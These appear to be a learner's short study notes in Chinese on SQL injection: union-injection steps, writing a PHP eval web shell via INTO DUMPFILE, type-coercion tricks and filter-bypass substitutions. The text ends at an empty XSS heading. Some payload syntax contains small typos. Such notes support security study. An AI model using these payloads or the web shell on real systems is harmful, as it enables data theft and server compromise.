day2
联合注入要点:
1.判断闭合方式,构造闭合:字符型构造闭合:?id=(‘1’)’–+
2.判断字段数 order by
3.找回显点
写文件
函数:
into outfile
dumpfile
条件:
1.有写的权限
2.有绝对路径
简单木马文件:select 1’,<?php@eval($_GET[1]);?>'3into dumpfile 路径
强制转换:以字符开头强制转换为0,如’admin123’=0;
以数字开头强制转换为开头数字,如’1admin23’=1;
被过滤时的常规替代:
and = &&
or = ||
ascii = hex() ord bin
substr = mid ,
= left 从左截取
= right 从右截取
空格 = ${IFS}, %09 (tab键),%0a(换行符)
or被过滤时,information_schema的替换
sys.schema_table_statistics_with_buffer
concat被过滤
make_set(),lpad(),reversel()
逗号被过滤
使用join(起别名)
select 1,2,3; 可以替换成
select * from (select1)a join (select 2)b join (select 3)c;
xss:
反射型xss(弹窗):